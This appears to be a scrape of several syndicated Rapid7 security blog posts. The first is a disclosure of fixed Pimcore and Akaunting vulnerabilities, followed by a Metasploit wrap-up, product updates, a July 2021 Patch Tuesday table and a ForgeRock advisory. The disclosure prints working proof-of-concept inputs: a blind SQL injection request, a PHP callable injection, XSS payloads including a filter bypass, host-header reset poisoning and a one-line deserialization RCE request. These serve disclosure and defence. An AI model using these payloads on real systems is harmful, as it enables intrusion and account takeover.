Requests sent to `/admin/object/grid-proxy` are handled by `Bundles/AdminBundle/Controller/Admin/DataObject/DataObjectController.php` file, starting on line 1568, as shown below:

Multiple Open Source Web App Vulnerabilities Fixed

This file collects all the parameters (line 1586), then includes the parameters in a call to `prepareListingForGrid` shown below:

Multiple Open Source Web App Vulnerabilities Fixed

`prepareListingForGrid` is found in the previously mentioned `Pimcore/Bundles/AdminBundle/Helper/GridHelperService.php` file and starts on line 489. This function builds the SQL query from the provided parameters. The parameter `specificID` is vulnerable to SQL injection, since the `specificId` parameter data is concatenated directly into the string and then added to the `$conditionFilters` array, as shown below:

Multiple Open Source Web App Vulnerabilities Fixed

A request to the `grid-proxy` url is shown below. In this query, the `specificId` field is set to `1+or+’a’=’a’`. The response shows a content-length of 7546.

GET /admin/object/grid-proxy/classId=BS&[other params]&specificId=1+or+’a’=’a’&query=[other params] HTTP/1.1

Multiple Open Source Web App Vulnerabilities Fixed

This next request sets the `specificId` parameter to `1+or’a’=’b’`. As shown in the following image, the response length is now 47, and no records were returned.

Multiple Open Source Web App Vulnerabilities Fixed

By combining these 2 requests, a malicious actor can programmatically return data from the database by testing each character and monitoring the response. The image below shows an example of this by requesting the database version and checking if the first character of the version is equal to 8.

Multiple Open Source Web App Vulnerabilities Fixed

Akaunting v2.1.12 (6 issues)

Akaunting is an enterprise accounting system, providing a variety of services related to the normal day-to-day business operations, notably in the retail sector, such as invoicing and expense tracking. More about Akaunting can be found at the vendor’s website.

CVE-2021-36800: Akaunting OS Command Injection

The Akaunting application allows for PHP code sent to the application to be executed by the web server. This can lead to a shell directly on the host operating system. The vulnerability was introduced upon the creation of the `Money.php` file in the first commit, 1c01d2120941d99f758cf23be20fe5931bdd4a36. To exploit this vulnerability, the attacker must first be authenticated and already have permissions to add or modify sales invoices.

A POST sent to `/{company_id}/sales/invoices/{invoice_id}` with an `items[0][price]` that includes a PHP callable function is executed directly. The image below shows the post body, including a `items[0][price]` set to `phpinfo`. The response on the right shows the response, which includes the results from the application executing `phpinfo()`:

Multiple Open Source Web App Vulnerabilities Fixed

This is due to a lack of input sanitization in the Money.php middleware component. The following is the code responsible for the execution; as shown, it checks to see if what is received is callable and, if so, executes it.

protected function parseAmountFromCallable($amount)
{
if (!is_callable($amount)) {
return $amount;
}
return $amount();
}

CVE-2021-36801: Akaunting Authentication Bypass in Company Selection

A user is able to change the company their account is associated with, allowing them to view/modify information from another company. This vulnerability was introduced in the first commit of the application. To exploit this vulnerability, the attacker must first be authenticated as any user.

The first image shows that the user `Test_company_1` is associated with the company named `My Company`:

Multiple Open Source Web App Vulnerabilities Fixed

While logged in as the user `Test_company_1` we click on `Profile` to change the user settings:

Multiple Open Source Web App Vulnerabilities Fixed

By clicking on the `Save` button and intercepting the request, we can modify the `companies[0]` field to the `id` of another company. The image below shows changing the company information from 1 to 2 while updating the profile information:

Multiple Open Source Web App Vulnerabilities Fixed

Once done, viewing the dashboard shows that the associated company has been changed:

Multiple Open Source Web App Vulnerabilities Fixed

CVE-2021-36802: Akaunting DoS via User-Controlled ‘locale’ Variable

Any user can crash the Akaunting platform by supplying an invalid ‘locale’ variable as part of an otherwise well-formed HTTP POST request. This vulnerability was introduced in the first commit of the application. To exploit this vulnerability, the attacker must first be authenticated as any user.

The image below shows a post to `/2/settings/settings` with an invalid locale that is successfully processed without error:

Multiple Open Source Web App Vulnerabilities Fixed

Visiting any page will result in a 500 response:

Multiple Open Source Web App Vulnerabilities Fixed

CVE-2021-36803: Akaunting Avatar Persistent XSS

A user can inject HTML into the avatar upload process and trigger an XSS for anyone who views it, including high-privilege administrators of the application. This vulnerability was introduced in the first commit of the application. To exploit this vulnerability, the attacker must first be authenticated as any user.

The image below shows a post to `/{company_id}/auth/users/{user_id}` with HTML embedded in the image upload field:

Multiple Open Source Web App Vulnerabilities Fixed

Example payload:
“`

—————————–11088376342107705763341750165

Content-Disposition: form-data; name=”picture”; filename=”Screenshot_2021-05-02_05_11_16.png”

Content-Type: image/png

</pre><html><b>test</b><script>alert(‘xss’)</script><pre>

“`

The HTML is directly rendered on screen while accessing the avatar URL; e.g /{company_id}/uploads/{upload_id}:

Multiple Open Source Web App Vulnerabilities Fixed

CVE-2021-36804: Akaunting Password Reset Relay

Setting the host header while sending a Post to `/auth/forgot` endpoint changes the link generated by the application. An attacker can send a password-reset request for an existing user and modify the host header to point to a web server they control. If the user clicks on the password reset URL, the attacker will receive the password-reset token and can then set the password to something the attacker knows. This vulnerability was introduced in the first commit of the application. To exploit this vulnerability, the attacker must first know or guess the email address of a valid user.

The image below shows a post to the /auth/forgot endpoint, with the Host set to example.com:

Multiple Open Source Web App Vulnerabilities Fixed

The email sent by the application directs the user to the example.com domain with the password reset token.

Multiple Open Source Web App Vulnerabilities Fixed

Note that the root of this vulnerability is due to a design decision in the Laravel framework and how proxy headers are handled with respect to single instance and multi-tenant implementations. In other words, while CVE-2021-36804 is a (now fixed) vulnerability in Akaunting, other multi-tenant implementations involving Laravel should be aware that the default configuration of that framework is likely vulnerable to a similar issue. For more information on this design issue, please see Enlightn’s Host Injection Analyzer, Daniel Coulbourne’s tweet, and PR 5477 in the Laravel GitHub repository.

The Akaunting application allows for HTML to be written to the footer of a sales invoice and relies on its built-in “firewall” to prevent malicious code, such as XSS, from being accepted. The following example shows how specially crafted HTML code can bypass the filtering. This vulnerability was introduced in the first commit of the application. To exploit this vulnerability, the attacker must have the permissions to add or modify sales invoices.

A POST sent to `/{company_id}/sales/invoices/{invoice_id}` with a `footer` that includes the following HTML will execute the javascript:

Proof of concept payload:

POST /1/sales/invoices/201 HTTP/1.1
...
-----------------------------11766653461285783364827965738
Content-Disposition: form-data; name="footer"
'\"<img class="/>" onerror=alert("Vulnerable+to+XSS") src="b.png"
-----------------------------11766653461285783364827965738
…

The results of viewing the sales invoice:

Multiple Open Source Web App Vulnerabilities Fixed

The payload bypasses the firewall restrictions because of the `>` placed in the class attribute. The image below shows how this string is not matched against the regex designed to prevent XSS:

Multiple Open Source Web App Vulnerabilities Fixed

Remediation

For all of these issues, updating to the latest versions of the affected applications will resolve them. If updating is difficult or impossible due to external factors or custom, local changes, users of these applications can limit their exposure by not presenting their production instances to the internet directly — instead, expose them only to trusted internal networks with trusted insiders.

Alternatively, since these applications are open source, users can contact these projects directly for any help needed to backport a fix to their own running version. One way to discover the exact code changes is simply to look at the git diffs between the fixed version and the most immediately prior version, and the fixes should be fairly obvious to anyone familiar with the languages in which these applications are written. In general, fixing bugs is fairly straightforward once you know what the vulnerabilities are. Finding and proving out the bugs is the hard part, so thanks again to Wiktor and Trevor for their work here.

Metasploit Wrap-Up

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2021/07/23/metasploit-wrap-up-122/

Metasploit Wrap-Up

Now I Control Your Resource Planning Servers

Sage X3 is a resource planning product designed by Sage Group which is designed to help established businesses plan out their business operations. But what if you wanted to do more than just manage resources? What if you wanted to hijack the resource server itself? Well wait no more, as thanks to the work of Aaron Herndon, Jonathan Peterson, William Vu, Cale Black, and Ryan Villarreal along with work from community contributor deadjakk, Metasploit now has an exploit module for CVE-2020-7388 and CVE-2020-7387, to allow unauthenticated attackers to gain SYSTEM level code execution on affected versions of Sage X3. This module should prove very useful on engagements both as a way to gain an initial foothold in a target network, as well as a way to elevate privileges to allow for more effective pivoting throughout the target network. More information on these vulnerabilities can be found in our detailed writeup post on our blog.

Help My Server is Raining Keys

Another great module that landed this week was an exploit for CVE-2021-27850 from Johannes Mortiz and Yann Castel aka Hakyac, which allows attackers to steal the HMAC key from applications that use a vulnerable version of the Apache Tapestry web framework. This HMAC key is particularly important in many applications as it is often used to sign important data within the application. However in the case of Apache Tapestry, one can actually take this even further and use the leaked HMAC key to exploit a separate Java deserialization vulnerability in Apache Tapestry to gain RCE using readily available gadgets such as CommonBeansUtil1 from ysoserial. Therefore this should be one to keep an eye out for and patch if you haven’t already.

PrintNightmare Improvements

Improvements have been made to the PrintNightmare module thanks to Spencer McIntyre to improve the way that Metasploit checks if a target is vulnerable or not, as well as to incorporate the \??\UNC\ bypass for the second and most recent patch at the time of writing. Additionally, a separate bug was fixed in Metasploit’s DCERPC library to prevent crashes when handling fragmented responses from the target server that could not fit into a single packet. These fixes should help ensure that not only is Metasploit able to better detect servers that are vulnerable to PrintNightmare, but also help target those servers that may not have fully applied all the appropriate patches and mitigations.

New module content (4)

Enhancements and features

  • #15403 from pingport80 – This makes changes to the Powershell session type to report its platform using a value consistent with the other session types. It also adds Powershell session support to some methods within the file mixin.
  • #15409 from zeroSteiner – An update has been made to the PrintNightmare module to improve the way that it checks if a target is vulnerable or not and to now automatically converts UNC paths to use the \??\UNC\host\path\to\dll format to bypass the second and most recent patch at the time of writing. Additionally a bug was fixed in the DCERPC library where data that was read would be incomplete when the response would not fit into a single fragment to ensure that the PrintNightmare module can now read long responses from the target such as when enumerating the installed printer drivers.
  • #15440 from bwatters-r7 – This PR updates the payloads gem to include updates to Kiwi. For more information, see rapid7/mimikatz#5 and rapid7/metasploit-payloads#490

Bugs fixed

  • #14683 from gwillcox-r7 – This replaces a cryptic exception raised by msfvenom when an incompatible EXE template file is used with a specific injection technique. The new exception validates whether the EXE is compatible and reports the reason it is not so the user can more easily understand the problem.
  • #15436 from sjanusz-r7 – Ensure that generated variable names aren’t Java keywords
  • #15443 from dwelch-r7 – Adds python3 support for the wmiexec external module auxiliary/scanner/smb/impacket/wmiexec
  • #15445 from zeroSteiner – Updates msfconsole’s output logs to only show the target’s ip when an exploit module is run, rather than a host-hash

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Accelerating SecOps and Emergent Threat Response with the Insight Platform

Post Syndicated from Lee Weiner original https://blog.rapid7.com/2021/07/19/insight-platform-and-extended-detection-response/

Accelerating SecOps and Emergent Threat Response with the Insight Platform

When we talk to customers about the Insight Platform and how to best support their evolving needs, they’re often not asking for another product, but rather a capability that enhances a current experience. Our customers have the core ingredients of a robust security program, but as their attack surfaces endlessly sprawl, they’re looking for ways to double down on the efficiency and streamlining of security operations they’re already experiencing from the platform today. Efficiency and streamlined operations are 2 areas where our team will continue to focus efforts in order to deliver value across Rapid7’s growing best-in-class portfolio, while enabling cross-capability experiences that improve security-team effectiveness.

Responding to emerging threats and vulnerabilities: Alerts are not enough

One of Rapid7’s greatest strengths is the fact that we have market-leading products in detection and response, cloud security, and vulnerability management. As we increasingly see customers leveraging our products, there are many similar expectations from those user bases. One that stands out is the expectation/demand that Rapid7 quickly respond to emerging threats and new vulnerabilities in a way that provides actionable context. We refer to this program as Emergent Threat Response. We spend a lot of time on this today, though we need to do more here for our customers to help them combat emerging threats. We’re often addressing and detailing out what we know and what we’re doing about high-profile threats (e.g. SolarWinds SUNBURST, Microsoft Exchange Zero-Day), and while our customers have responded very positively to this type of outreach, they have also asked for more of it!

We have a unique opportunity with customers to enable a 2-way conversation. Our customers need to improve signal-to-noise, and our Emergent Threat Response approach does help to accomplish that. We can do a lot more though, and with more intelligence on the internal and external threat landscape we can offer more context and treat more threats with Emergent Threat Response. We’re constantly obsessing over improving signal-to-noise, so we’re careful to pick our spots. However, while an emerging threat may only impact a very small percentage of machines across our customer base, impacted customers may categorize those machines as high-value assets. Customers may also have a lot of interest in a specific threat group and are eager to learn more about them and the detections we have available for their known techniques. In both of these use cases — whether we’re pushing our intelligence or allowing customers to pull it — we can maintain our high standards for signal-to-noise as long as we’re always prioritizing relevancy.

The Insight Platform + IntSights: Enriching alerts and driving contextualized intelligence

When customers are battling emergent threats, core alerts and vulnerability information is important; but our customers are increasingly looking to understand more about adversary groups, tactics and techniques, and why they were targeted. Today we have a very comprehensive view of our customers’ internal networks. This is incredibly helpful to power every product we provide, but investing in more scalable ways to connect this internal profile to an external view of the world increases our ability to deliver timely, relevant, and actionable intelligence. With IntSights joining the Rapid7 family, this aspiration has become a reality. Beyond the Emergent Threat Response use case we drilled into here, the platform will leverage IntSights’ contextualized external threat intelligence to power and strengthen our threat library, risk scoring, and vulnerability prioritization. We believe we can add/enhance capabilities across the portfolio to not only help our customers solve the security concerns of today, but also take a proactive approach to defend against the security concerns of tomorrow.

Learn more about what’s in store for the Insight Platform as Rapid7 welcomes IntSights.

What’s New in InsightVM: Q2 2021 in Review

Post Syndicated from Aaron Wells original https://blog.rapid7.com/2021/07/16/insightvm-release-roundup-q2-2021/

What’s New in InsightVM: Q2 2021 in Review

The world is changing rapidly. We hear that phrase a lot. Throughout Q2 though, it really is true. Vaccines have been rolling out, to varying success depending on the part of the world, but there is optimism.    

As Rapid7 offices begin to open up to our hard-working team members around the globe, we want to infuse some of that optimism into the latest and greatest new features and updates now available to InsightVM customers. The back half of the year will no doubt bring new threats (will ransomware attacks keep going bigger?), so let’s dive into what’s new so you can prepare and prosper.

Honorable mention

In our Q1 recap, we covered 2 releases that can each have significant positive impact on your operations, so they bear repeating here.

Kubernetes integration

Now available in InsightVM, you can now navigate directly to the new Kubernetes tab to initiate the Kubernetes monitor in DockerHub. Then, deploy it to your clusters to see data in Container VRM within InsightVM. You can also see monitor health and connection details via the Data Collection Management page.  

Scoped Executive Summary Report

The Executive Summary Report in InsightVM has expanded its functionality so users can filter the report for at-a-glance views of priority items. Shape the report to access key metrics and communicate progress to desired goals and outcomes.

Dashboards, consoles, and panels, oh my!

The new releases and updates for the second quarter of 2021 were aimed at quick-look features that bolster our goal of providing customers with evolving ease-of-use functionalities and products that increasingly focus on at-a-glance convenience.

What’s new: Dialing up dashboard performance

Featuring new cards as well as new ways to filter cards, these features solve 3 distinct issues:

Gaining insights into Microsoft’s vulnerability patch cycle

Rapid7’s Patch Tuesday dashboard template now provides an easy way to stay up to date on information associated with deployment of new Microsoft patches and cycles. Why search around for news or insights when you can get them in the one-stop-shop where your team already receives updates and kicks off remediation efforts on the latest vulnerabilities?

Featuring new cards detailing the assets affected as well as trends, assessments, and biggest risks, you can now learn about and prioritize remediation efforts on all Microsoft vulnerabilities within this expanded InsightVM dashboard.  

Hunting down fine-grained vulnerability-and-remediation details

  • New card #1: New vs remediated vulnerability comparison over time
    • Displays trends in remediated vulnerability findings for date ranges you specify.
  • New card #2: Average days to remediate by severity
    • Compares the average number of days needed to remediate a specific vulnerability against all vulnerabilities remediated for a week you specify.
  • New card #3: Number of unique vulnerabilities
    • Expandable table shows the number of all unique vulnerabilities in the Rapid7 database for which InsightVM has checks as well as the number of all unique vulnerabilities in the user’s environment.
  • New card #4: Asset type
    • Bar chart displays device type for assets in the scope you filter. Each bar shows the quantity of a group of os.type, sorted from left to right.

Filtering every card in a dashboard to focus the view on a group of assets or issues

If this were about finding the best way to navigate your way past a big city, we would say this new feature is the loop that takes you around the traffic vs taking the surface streets that often put you in the traffic.

You can now quickly filter all of your cards by applying a single query to your dashboard. Gone are the days of manually filtering each and every card just to focus your view on a group of assets or vulnerabilities. Long story short: You save more time by quickly filtering to your desired view.  

What’s improved: Shortcuts to what you need

To continue the traffic analogy, getting somewhere faster than you’re used to is always a great thing. The latest InsightVM improvements help you do just that by addressing 3 issues:

Manually loading custom vulnerability checks

Now you can simply deploy a check, load it into the Security Console, then the console does the rest. Just load the check, start the scan, and the console will automatically push that check to whichever Scan Engine(s) you specify.

More context needed

Peek. Panel. Proof. What that actually means is InsightVM now offers at-a-glance context about a specific vulnerability via a “peek panel.” When a user clicks on an affected asset from the vulnerability details page, the panel opens to the right and displays the proof details.  

Gaining results visibility

Teams assessing container image builds in their CI/CD pipeline can now see results in the InsightVM Container Security feature Builds tab.

We hope you have a successful quarter and a great season, wherever your business takes you. Until next time…    

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Patch Tuesday – July 2021

Post Syndicated from Adam Bunn original https://blog.rapid7.com/2021/07/13/patch-tuesday-july-2021/

Patch Tuesday - July 2021

Microsoft has patched another 117 CVEs, returning to volumes seen in early 2021 and most of 2020. It would appear that the recent trend of approximately 50 vulnerability fixes per month was not indicative of a slowing pace. This month there were 13 vulnerabilities rated Critical with nearly the rest being rated Important. Thankfully, none of the updates published today require additional steps to remediate, so administrators should be able to rely on their normal patching process. Once CVE-2021-34527 has been remediated, priority should be to patch public facing DNS and Exchange servers, followed by Workstations, SharePoint servers, and finally Office applications.

It seems like the PrintNightmare is nearly over. While the past two weeks have been a frenzy for the security community there has been no new information since the end of last week when Microsoft made a final revision to their guidance on CVE-2021-34527. If you haven’t patched this yet, this is your daily reminder. For further details please see our blog on the topic.

Multiple Critical DNS Vulnerabilities Patched

Administrators should focus their efforts on the 11 vulnerabilities in Windows DNS server to reduce the most risk. The two most important of these vulnerabilities are CVE-2021-34494 and CVE-2021-33780. Exploitation of either of these vulnerabilities would result in Remote Code Execution with SYSTEM privileges without any user interaction via the network. Given the network exposure of DNS servers these vulnerabilities could prove to be troublesome if an exploit were to be developed. Microsoft lists CVE-2021-33780 as “Exploitation More Likely” so it may only be a matter of time before attackers attempt to make use of these flaws.

New Exchange Updates Available

Only 4 of the 7 Exchange CVEs being disclosed this month are new. The two most severe vulnerabilities were patched in back in April and were mistakenly not disclosed. This means that if you applied the April 2021 updates you will not need to take any action for CVE-2021-34473, CVE-2021-34523, or CVE-2021-33766. Of the 4 newly patched vulnerabilities the most notable is CVE-2021-31206, a remote code execution flaw discovered in the recent Pwn2Own competition.

Scripting Engine Exploited in the Wild

Exploitation of CVE-2021-34448 has been observed in the wild by researchers. There are no details on the frequency or spread of this exploit. This vulnerability requires the user to visit a link to download a malicious file. As with other vulnerabilities that require user interaction, strong security hygiene is the first line of defense.

Summary Tables

Here are this month’s patched vulnerabilities split by the product family.

Apps Vulnerabilities

CVE Title Exploited Disclosed CVSS3 FAQ
CVE-2021-33753 Microsoft Bing Search Spoofing Vulnerability No No 4.7 Yes

Developer Tools Vulnerabilities

CVE Title Exploited Disclosed CVSS3 FAQ
CVE-2021-34528 Visual Studio Code Remote Code Execution Vulnerability No No 7.8 No
CVE-2021-34529 Visual Studio Code Remote Code Execution Vulnerability No No 7.8 Yes
CVE-2021-34477 Visual Studio Code .NET Runtime Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-33767 Open Enclave SDK Elevation of Privilege Vulnerability No No 8.2 Yes
CVE-2021-34479 Microsoft Visual Studio Spoofing Vulnerability No No 7.8 No

Exchange Server Vulnerabilities

CVE Title Exploited Disclosed CVSS3 FAQ
CVE-2021-34473 Microsoft Exchange Server Remote Code Execution Vulnerability No Yes 9.1 No
CVE-2021-31206 Microsoft Exchange Server Remote Code Execution Vulnerability No No 7.6 Yes
CVE-2021-31196 Microsoft Exchange Server Remote Code Execution Vulnerability No No 7.2 No
CVE-2021-34523 Microsoft Exchange Server Elevation of Privilege Vulnerability No Yes 9 No
CVE-2021-33768 Microsoft Exchange Server Elevation of Privilege Vulnerability No No 8 Yes
CVE-2021-34470 Microsoft Exchange Server Elevation of Privilege Vulnerability No No 8 Yes
CVE-2021-33766 Microsoft Exchange Information Disclosure Vulnerability No No 7.3 Yes

Microsoft Dynamics Vulnerabilities

CVE Title Exploited Disclosed CVSS3 FAQ
CVE-2021-34474 Dynamics Business Central Remote Code Execution Vulnerability No No 8 Yes

Microsoft Office Vulnerabilities

CVE Title Exploited Disclosed CVSS3 FAQ
CVE-2021-34452 Microsoft Word Remote Code Execution Vulnerability No No 7.8 Yes
CVE-2021-34517 Microsoft SharePoint Server Spoofing Vulnerability No No 5.3 No
CVE-2021-34520 Microsoft SharePoint Server Remote Code Execution Vulnerability No No 8.1 No
CVE-2021-34467 Microsoft SharePoint Server Remote Code Execution Vulnerability No No 7.1 No
CVE-2021-34468 Microsoft SharePoint Server Remote Code Execution Vulnerability No No 7.1 Yes
CVE-2021-34519 Microsoft SharePoint Server Information Disclosure Vulnerability No No 5.3 Yes
CVE-2021-34469 Microsoft Office Security Feature Bypass Vulnerability No No 8.2 Yes
CVE-2021-34451 Microsoft Office Online Server Spoofing Vulnerability No No 5.3 Yes
CVE-2021-34501 Microsoft Excel Remote Code Execution Vulnerability No No 7.8 Yes
CVE-2021-34518 Microsoft Excel Remote Code Execution Vulnerability No No 7.8 Yes

SQL Server Vulnerabilities

CVE Title Exploited Disclosed CVSS3 FAQ
CVE-2021-31984 Power BI Remote Code Execution Vulnerability No No 7.6 Yes

System Center Vulnerabilities

CVE Title Exploited Disclosed CVSS3 FAQ
CVE-2021-34464 Microsoft Defender Remote Code Execution Vulnerability No No 7.8 Yes
CVE-2021-34522 Microsoft Defender Remote Code Execution Vulnerability No No 7.8 Yes

Windows Vulnerabilities

CVE Title Exploited Disclosed CVSS3 FAQ
CVE-2021-33772 Windows TCP/IP Driver Denial of Service Vulnerability No No 7.5 No
CVE-2021-34490 Windows TCP/IP Driver Denial of Service Vulnerability No No 7.5 No
CVE-2021-33744 Windows Secure Kernel Mode Security Feature Bypass Vulnerability No No 5.3 No
CVE-2021-33763 Windows Remote Access Connection Manager Information Disclosure Vulnerability No No 5.5 Yes
CVE-2021-34454 Windows Remote Access Connection Manager Information Disclosure Vulnerability No No 5.5 Yes
CVE-2021-33761 Windows Remote Access Connection Manager Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-33773 Windows Remote Access Connection Manager Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-34445 Windows Remote Access Connection Manager Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-33743 Windows Projected File System Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-34493 Windows Partition Management Driver Elevation of Privilege Vulnerability No No 6.7 No
CVE-2021-33740 Windows Media Remote Code Execution Vulnerability No No 7.8 No
CVE-2021-34458 Windows Kernel Remote Code Execution Vulnerability No No 9.9 Yes
CVE-2021-34508 Windows Kernel Remote Code Execution Vulnerability No No 8.8 No
CVE-2021-33771 Windows Kernel Elevation of Privilege Vulnerability Yes No 7.8 No
CVE-2021-31961 Windows InstallService Elevation of Privilege Vulnerability No No 6.1 Yes
CVE-2021-34450 Windows Hyper-V Remote Code Execution Vulnerability No No 8.5 Yes
CVE-2021-33758 Windows Hyper-V Denial of Service Vulnerability No No 7.7 No
CVE-2021-33755 Windows Hyper-V Denial of Service Vulnerability No No 6.3 No
CVE-2021-34466 Windows Hello Security Feature Bypass Vulnerability No No 5.7 Yes
CVE-2021-34438 Windows Font Driver Host Remote Code Execution Vulnerability No No 7.8 No
CVE-2021-34455 Windows File History Service Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-33774 Windows Event Tracing Elevation of Privilege Vulnerability No No 7 No
CVE-2021-33759 Windows Desktop Bridge Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-34525 Windows DNS Server Remote Code Execution Vulnerability No No 8.8 No
CVE-2021-34461 Windows Container Isolation FS Filter Driver Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-34488 Windows Console Driver Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-33784 Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-34462 Windows AppX Deployment Extensions Elevation of Privilege Vulnerability No No 7 No
CVE-2021-34459 Windows AppContainer Elevation Of Privilege Vulnerability No No 7.8 No
CVE-2021-33785 Windows AF_UNIX Socket Provider Denial of Service Vulnerability No No 7.5 No
CVE-2021-33779 Windows ADFS Security Feature Bypass Vulnerability No Yes 8.1 Yes
CVE-2021-34491 Win32k Information Disclosure Vulnerability No No 5.5 Yes
CVE-2021-34449 Win32k Elevation of Privilege Vulnerability No No 7 No
CVE-2021-34509 Storage Spaces Controller Information Disclosure Vulnerability No No 5.5 Yes
CVE-2021-34460 Storage Spaces Controller Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-34510 Storage Spaces Controller Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-34512 Storage Spaces Controller Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-34513 Storage Spaces Controller Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-33751 Storage Spaces Controller Elevation of Privilege Vulnerability No No 7 No
CVE-2021-34521 Raw Image Extension Remote Code Execution Vulnerability No No 7.8 Yes
CVE-2021-34439 Microsoft Windows Media Foundation Remote Code Execution Vulnerability No No 7.8 No
CVE-2021-34503 Microsoft Windows Media Foundation Remote Code Execution Vulnerability No No 7.8 No
CVE-2021-33760 Media Foundation Information Disclosure Vulnerability No No 5.5 Yes
CVE-2021-31947 HEVC Video Extensions Remote Code Execution Vulnerability No No 7.8 Yes
CVE-2021-33775 HEVC Video Extensions Remote Code Execution Vulnerability No No 7.8 Yes
CVE-2021-33776 HEVC Video Extensions Remote Code Execution Vulnerability No No 7.8 Yes
CVE-2021-33777 HEVC Video Extensions Remote Code Execution Vulnerability No No 7.8 Yes
CVE-2021-33778 HEVC Video Extensions Remote Code Execution Vulnerability No No 7.8 Yes
CVE-2021-34489 DirectWrite Remote Code Execution Vulnerability No No 7.8 Yes
CVE-2021-33781 Active Directory Security Feature Bypass Vulnerability No Yes 8.1 No

Windows ESU Vulnerabilities

CVE Title Exploited Disclosed CVSS3 FAQ
CVE-2021-31183 Windows TCP/IP Driver Denial of Service Vulnerability No No 7.5 No
CVE-2021-33757 Windows Security Account Manager Remote Protocol Security Feature Bypass Vulnerability No No 5.3 Yes
CVE-2021-33783 Windows SMB Information Disclosure Vulnerability No No 6.5 Yes
CVE-2021-34507 Windows Remote Assistance Information Disclosure Vulnerability No No 6.5 Yes
CVE-2021-34457 Windows Remote Access Connection Manager Information Disclosure Vulnerability No No 5.5 Yes
CVE-2021-34456 Windows Remote Access Connection Manager Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-34527 Windows Print Spooler Remote Code Execution Vulnerability Yes Yes 8.8 Yes
CVE-2021-34497 Windows MSHTML Platform Remote Code Execution Vulnerability No No 6.8 Yes
CVE-2021-34447 Windows MSHTML Platform Remote Code Execution Vulnerability No No 6.8 Yes
CVE-2021-33786 Windows LSA Security Feature Bypass Vulnerability No No 8.1 Yes
CVE-2021-33788 Windows LSA Denial of Service Vulnerability No No 7.5 No
CVE-2021-33764 Windows Key Distribution Center Information Disclosure Vulnerability No No 5.9 Yes
CVE-2021-34500 Windows Kernel Memory Information Disclosure Vulnerability No No 6.3 Yes
CVE-2021-31979 Windows Kernel Elevation of Privilege Vulnerability Yes No 7.8 No
CVE-2021-34514 Windows Kernel Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-33765 Windows Installer Spoofing Vulnerability No No 6.2 No
CVE-2021-34511 Windows Installer Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-34446 Windows HTML Platforms Security Feature Bypass Vulnerability No No 8 No
CVE-2021-34496 Windows GDI Information Disclosure Vulnerability No No 5.5 Yes
CVE-2021-34498 Windows GDI Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-33749 Windows DNS Snap-in Remote Code Execution Vulnerability No No 8.8 Yes
CVE-2021-33750 Windows DNS Snap-in Remote Code Execution Vulnerability No No 8.8 Yes
CVE-2021-33752 Windows DNS Snap-in Remote Code Execution Vulnerability No No 8.8 Yes
CVE-2021-33756 Windows DNS Snap-in Remote Code Execution Vulnerability No No 8.8 Yes
CVE-2021-34494 Windows DNS Server Remote Code Execution Vulnerability No No 8.8 Yes
CVE-2021-33780 Windows DNS Server Remote Code Execution Vulnerability No No 8.8 Yes
CVE-2021-33746 Windows DNS Server Remote Code Execution Vulnerability No No 8 No
CVE-2021-33754 Windows DNS Server Remote Code Execution Vulnerability No No 8 No
CVE-2021-34442 Windows DNS Server Denial of Service Vulnerability No No 7.5 Yes
CVE-2021-34444 Windows DNS Server Denial of Service Vulnerability No No 6.5 Yes
CVE-2021-34499 Windows DNS Server Denial of Service Vulnerability No No 6.5 No
CVE-2021-33745 Windows DNS Server Denial of Service Vulnerability No No 6.5 Yes
CVE-2021-34492 Windows Certificate Spoofing Vulnerability No Yes 8.1 No
CVE-2021-33782 Windows Authenticode Spoofing Vulnerability No No 5.5 No
CVE-2021-34504 Windows Address Book Remote Code Execution Vulnerability No No 7.8 No
CVE-2021-34516 Win32k Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-34448 Scripting Engine Memory Corruption Vulnerability Yes No 6.8 Yes
CVE-2021-34441 Microsoft Windows Media Foundation Remote Code Execution Vulnerability No No 7.8 No
CVE-2021-34440 GDI+ Information Disclosure Vulnerability No No 5.5 Yes
CVE-2021-34476 Bowser.sys Denial of Service Vulnerability No No 7.5 No

Summary Graphs

Patch Tuesday - July 2021
Patch Tuesday - July 2021
Patch Tuesday - July 2021
Patch Tuesday - July 2021

ForgeRock Access Manager/OpenAM Pre-Auth Remote Code Execution Vulnerability (CVE-2021-35464): What You Need To Know

Post Syndicated from boB Rudis original https://blog.rapid7.com/2021/06/30/forgerock-openam-pre-auth-remote-code-execution-vulnerability-what-you-need-to-know/

ForgeRock Access Manager/OpenAM Pre-Auth Remote Code Execution Vulnerability (CVE-2021-35464): What You Need To Know

On June 29, 2021, security researcher Michael Stepankin (@artsploit) posted details of CVE-2021-35464, a pre-auth remote code execution (RCE) vulnerability in ForgeRock Access Manager identity and access management software. ForgeRock front-ends web applications and remote access solutions in many enterprises.

ForgeRock has issued Security Advisory #202104 to provide information on this vulnerability and will be updating it if and when patches are available.

The weakness exists due to unsafe object deserialization via the Jato framework, with a disturbingly diminutive proof of concept that requires a single GET/POST request for code execution:

GET /openam/oauth2/..;/ccversion/Version?jato.pageSession=<serialized_object>

ForgeRock versions below 7.0 running on Java 8 are vulnerable and the weakness also exists in unpatched versions of the Open Identify Platform’s fork of OpenAM. ForgeRock/OIP installations running on Java 9 or higher are unaffected.

